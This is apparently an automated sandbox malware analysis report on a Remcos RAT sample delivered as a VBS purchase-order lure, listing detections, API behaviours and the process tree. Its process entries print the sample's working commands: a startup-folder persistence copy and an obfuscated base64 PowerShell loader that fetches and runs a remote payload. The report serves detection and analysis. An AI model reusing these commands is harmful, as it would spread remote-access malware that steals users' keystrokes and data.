Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040A65A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_00414EC1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040A65A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

11_2_00409468

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2646574192.000000000262E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7444, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_0041A76C SystemParametersInfoW,

11_2_0041A76C

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7964, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 7444, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Sample has a suspicious name (potential lure to open the executable)

Source: Purchase Order - PO14895.vbs

Static file information: Suspicious name

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

11_2_00414DB4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886D03292	5_2_00007FF886D03292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00425152	11_2_00425152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00435286	11_2_00435286
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004513D4	11_2_004513D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0045050B	11_2_0045050B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00436510	11_2_00436510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004316FB	11_2_004316FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0043569E	11_2_0043569E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00443700	11_2_00443700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004257FB	11_2_004257FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004128E3	11_2_004128E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00425964	11_2_00425964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0041B917	11_2_0041B917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0043D9CC	11_2_0043D9CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00435AD3	11_2_00435AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00424BC3	11_2_00424BC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0043DBFB	11_2_0043DBFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0044ABA9	11_2_0044ABA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00433C0B	11_2_00433C0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00434D8A	11_2_00434D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0043DE2A	11_2_0043DE2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0041CEAF	11_2_0041CEAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00435F08	11_2_00435F08

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00432B90 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00432525 appears 41 times

Source: Purchase Order - PO14895.vbs

Initial sample: Strings found which are bigger than 50

Source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7964, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: AddInProcess32.exe PID: 7444, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@17/8@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

11_2_00415C90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

11_2_0040E2E7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_00419493

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_00418A00

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\chrorne-9OH0YR
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3hpztb5.1fc.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
